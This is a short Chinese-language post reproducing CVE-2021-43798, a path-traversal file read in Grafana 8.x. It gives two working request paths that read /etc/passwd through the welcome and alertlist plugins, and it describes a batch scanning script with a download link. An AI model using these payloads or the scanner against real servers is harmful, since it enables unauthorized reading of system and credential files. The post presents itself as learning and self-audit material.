Grafana 任意文件读取漏洞复现(CVE-2021-43798)

此文章仅用于学习以及企业自检，请不要用于违法用途。

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。

通过默认存在的插件来拼接文件路径构造请求进行文件读取

漏洞状态：

该漏洞暂无补丁，伪0day状态

受影响版本：

Grafana 8.x 系列

验证poc：

构造get请求

/public/plugins/welcome/../../../../../../../../../etc/passwd
/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
第一条适合在burp里面使用，但是直接在浏览器访问会被过滤掉，第二条适用于在浏览器里直接访问，二者没有什么区别，alertlist与welcome为两个插件，基本上这两个就够用了，如果对方没有安装这俩插件那么可以将这个关键词进行枚举即可

复现过程：

使用脚本检测-支持单独检测与批量检测

python Grafana.py -u http://ip:port 注意不要在端口后加 “/”

批量检测：

python Grafana.py -r 12.txt

文件名字随便取

每个地址换行即可，不需要进行符号来区分

执行结束后会返回存在问题的url，输出至当前目录下的Grafana.txt文件内，不需要手动建立，会自动添加

存在漏洞的url保存结果如下

脚本获取方式可公众号回复
say_ohno!

我不懂安全

CVE-2021-43798脚本

或前往github下载

https://github.com/Ilovewomen/Grafana_CVE